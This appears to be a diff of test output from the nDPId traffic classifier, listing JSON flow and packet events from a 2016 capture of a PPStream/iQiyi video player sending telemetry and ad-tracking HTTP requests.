{"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} +01296{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1443,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195852,"flow_last_seen":1467353195852,"flow_idle_time":7580000,"flow_min_l4_payload_len":892,"flow_max_l4_payload_len":892,"flow_tot_l4_payload_len":892,"flow_avg_l4_payload_len":892,"midstream":1,"thread_ts_msec":1467353195852,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.236","src_port":50771,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/cp2.gif?a=4e3ae415a584748ac9aa31628f39d1e8&ai=&as=1:45:23|45&av=4.10.004&b=180932301&c=31&ct=5000000923447&d=2175&di=&dp=71000001&e=c4889e64ad9d9eeb9ff438910850c442&ec=&em=&fi=&g=0&l=MTE4LjE2My44Ljkw&mk=&nw=&od=5000000854934&oi=&p=a&pp=&rc=&rd=&ri=&s=1467353195054&sh=&sq=&sw=&t=sp&u=0_aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=479531000&vv=5.2.15.2240&x=&y=qc_100001_100140","code":0,"content_type":"","user_agent":"Mozilla\/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident\/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)\/QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00913{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353195855,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMjFAAIAGqNHAqHMIe31vRsZUAFDL+rP6wuI4bVAY\/\/CsBQAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1444,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353195855,"flow_last_seen":1467353195855,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353195855,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00647{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1446,"source":"pps.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":2,"flow_last_seen":1467353195956,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353195956,"pkt":"ABxCjnAxTF4M6gNlCABFAAC5xWxAADMGdMnKbA7swKhzCABQxlNWUKyA6k+aDlAYACCSWwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiBpbWFnZS9naWYNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00749{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1448,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":2,"flow_last_seen":1467353195998,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353195998,"pkt":"ABxCjnAxTF4M6gNlCABFAAEFPIVAAC8G7\/l7fW9GwKhzCABQxlTC4jhty\/q1U1AYPLjA5wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzUgR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":919,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":919,"pkt_l4_len":885,"thread_ts_msec":1467353196104,"pkt":"TF4M6gNlABxCjnAxCABFAAOJMkZAAIAGuC7AqHMIymwO3cZVAFB2diePbxSNNlAYAQSFkwAAR0VUIC9jb3JlP3Q9MSZyZXNldD0wJnZmcm10cD0xJnRtMT0mdG0yPTAmdG0yMT0wJnRtMjI9MCZ0bTIzPTAmdG0yND0wJnRtMz0yMDkmdG0zMT05NCZ0bTMyPTMxJnRtMzM9NzgmdG0zND0xJnRtND0xNzYmdG00MT00NyZ0bTQyPTE2JnRtNDM9NzgmdG00ND03JnRtNT0zMjgmdG01MT0wJnRtNTI9MCZ0bTUzPTAmdG01ND02MyZ0bTY9JnRtNjI9MCZ0bTYzPTAmdG03PTAmdG03MT0wJnRtNzI9MCZ0bTczPTAmdG04PTAmdG04MT0wJnRtODI9MCZ0bTgzPTAmdG05PTk2MiZ0bTkyPTE1JnRtOTM9Mjk3JmNoaXBpZD1JbnRlbCUyOFIlMjklMjBDb3JlJTI4VE0lMjklMjBpNSUyRDI1NTdNJTIwQ1BVJTIwJTQwJTIwMSUyRTcwR0h6JnJhPTEmaXNoY2RuPTImcGY9MjAxJnA9MTEmcDE9MTE0JnAyPTMwMDAmc2RrdHA9MSZjMT0zMSZyPTQ3OTUzMTAwMCZhaWQ9MTgwOTMyMzAxJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPVdpbmRvd3MlMjA3JnY9NSUyRTIlMkUxNSUyRTIyNDAma3J2PTIlMkUwJTJFMTAyJmR0PSZodT0tMSZybj0xNDY3MzUzMTk1JmlzbG9jYWw9MCZhcz0wMzExYzVhMGQ1NTk2MDYzZGI1OTQ0YmQ3NmI2Y2JmZiZ2ZT1iMWY5MGY4ZGE2ZmUwMjU4ZDEzNjE2YTgwNzBjYjk5NyZwZT0mdmZybT0mY2hsPSZoY2Rudj0xMC4wLjAuMjkzJnRwY2Q9MCZpc2RybT0xJmh0PTAgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1zZy43MS5hbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} -01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01445{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1450,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196104,"flow_last_seen":1467353196104,"flow_idle_time":7580000,"flow_min_l4_payload_len":865,"flow_max_l4_payload_len":865,"flow_tot_l4_payload_len":865,"flow_avg_l4_payload_len":865,"midstream":1,"thread_ts_msec":1467353196104,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.221","src_port":50773,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=1&reset=0&vfrmtp=1&tm1=&tm2=0&tm21=0&tm22=0&tm23=0&tm24=0&tm3=209&tm31=94&tm32=31&tm33=78&tm34=1&tm4=176&tm41=47&tm42=16&tm43=78&tm44=7&tm5=328&tm51=0&tm52=0&tm53=0&tm54=63&tm6=&tm62=0&tm63=0&tm7=0&tm71=0&tm72=0&tm73=0&tm8=0&tm81=0&tm82=0&tm83=0&tm9=962&tm92=15&tm93=297&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00648{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1453,"source":"pps.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":2,"flow_last_seen":1467353196204,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":199,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":199,"pkt_l4_len":165,"thread_ts_msec":1467353196204,"pkt":"ABxCjnAxTF4M6gNlCABFAAC53kZAADMGW\/7KbA7dwKhzCABQxlVvFI02dnYq8FAYAA859QAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuNC43DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM1IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQoNCg=="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00914{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":399,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":399,"pkt_l4_len":365,"thread_ts_msec":1467353196348,"pkt":"TF4M6gNlABxCjnAxCABFAAGBMltAAIAGqKfAqHMIe31vRsZXAFCyDhiCAe\/eKVAY\/\/B8ngAAR0VUIC9hcGlzL3VyYy9zZXRyYz9ja3VpZD1hYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbiZ0dklkPTQ3OTUzMTAwMCZ2aWRlb1BsYXlUaW1lPS0xJmFkZHRpbWU9MTQ2NzM1MzE5NSZ0ZXJtaW5hbElkPTEyJnZUeXBlPTAmY29tPTImcHBzVHZpZFR5cGU9MiZhZ2VudF90eXBlPTMwIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRaXlpIExpc3QgQ2xpZW50IFBDIDUuMi4xNS4yMjQwDQpIb3N0OiBubC5yY2QuaXFpeWkuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00950{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1454,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196348,"flow_last_seen":1467353196348,"flow_idle_time":7580000,"flow_min_l4_payload_len":345,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":345,"flow_avg_l4_payload_len":345,"midstream":1,"thread_ts_msec":1467353196348,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"nl.rcd.iqiyi.com","url":"nl.rcd.iqiyi.com\/apis\/urc\/setrc?ckuid=aaoefdtqgfdepxc2tnv3piucgcb4eofn&tvId=479531000&videoPlayTime=-1&addtime=1467353195&terminalId=12&vType=0&com=2&ppsTvidType=2&agent_type=30","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 01165{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":587,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":587,"pkt_l4_len":553,"thread_ts_msec":1467353196393,"pkt":"TF4M6gNlABxCjnAxCABFAAI9Ml9AAIAGuWPAqHMIymwO28ZWAFBrRx\/mc\/0Jh1AYAQRafgAAR0VUIC9jb3JlP3Q9MTEmY3Q9YWRlbmQmcmVzZXQ9MCZyYT0xJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9MzEmcj00Nzk1MzEwMDAmYWlkPTE4MDkzMjMwMSZ1PWFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuJnB1PSZvcz1XaW5kb3dzJTIwNyZ2PTUlMkUyJTJFMTUlMkUyMjQwJmtydj0yJTJFMCUyRTEwMiZkdD0maHU9LTEmcm49MTQ2NzM1MzE5NSZpc2xvY2FsPTAmYXM9MDMxMWM1YTBkNTU5NjA2M2RiNTk0NGJkNzZiNmNiZmYmdmU9YjFmOTBmOGRhNmZlMDI1OGQxMzYxNmE4MDcwY2I5OTcmcGU9JnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} +01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1455,"source":"pps.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196393,"flow_last_seen":1467353196393,"flow_idle_time":7580000,"flow_min_l4_payload_len":533,"flow_max_l4_payload_len":533,"flow_tot_l4_payload_len":533,"flow_avg_l4_payload_len":533,"midstream":1,"thread_ts_msec":1467353196393,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50774,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": {"hostname":"msg.71.am","url":"msg.71.am\/core?t=11&ct=adend&reset=0&ra=1&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=31&r=479531000&aid=180932301&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=Windows%207&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353195&islocal=0&as=0311c5a0d5596063db5944bd76b6cbff&ve=b1f90f8da6fe0258d13616a8070cb997&pe=&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00908{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":394,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":394,"pkt_l4_len":360,"thread_ts_msec":1467353196441,"pkt":"TF4M6gNlABxCjnAxCABFAAF8MmRAAIAGDUzAqHMIb84WTcZYAFAHr7sEMj+LIFAYAQTIFgAAR0VUIC9iP3Q9MTEmcGY9MjAxJnA9MTEmcDE9MTE0JnMxPTAmY3Q9MTQwODE5X2Fkc3luJmFkc3luPTEmYnJpbmZvPUlFX0lFOV85LjAuODExMi4xNjQyMV8xJm9zPVdpbmRvd3MlMjA3JnJuPTE5MjUyJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdj01LjIuMTUuMjI0MCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6IG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} -00940{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1456,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353196441,"flow_last_seen":1467353196441,"flow_idle_time":7580000,"flow_min_l4_payload_len":340,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":340,"flow_avg_l4_payload_len":340,"midstream":1,"thread_ts_msec":1467353196441,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?t=11&pf=201&p=11&p1=114&s1=0&ct=140819_adsyn&adsyn=1&brinfo=IE_IE9_9.0.8112.16421_1&os=Windows%207&rn=19252&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&v=5.2.15.2240","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 